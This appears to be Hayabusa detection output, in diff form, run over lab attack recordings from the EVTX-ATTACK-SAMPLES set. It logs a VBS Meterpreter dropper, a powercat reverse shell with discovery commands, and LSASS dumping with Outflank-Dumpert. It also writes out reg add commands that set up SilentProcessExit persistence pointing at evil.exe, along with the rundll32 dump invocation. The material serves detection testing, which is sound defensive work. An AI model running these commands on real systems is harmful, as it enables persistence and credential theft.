+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,../hayabusa-rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,../hayabusa-rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.928 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.990 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:02.350 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:10.334 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:50.378 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,../hayabusa-rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
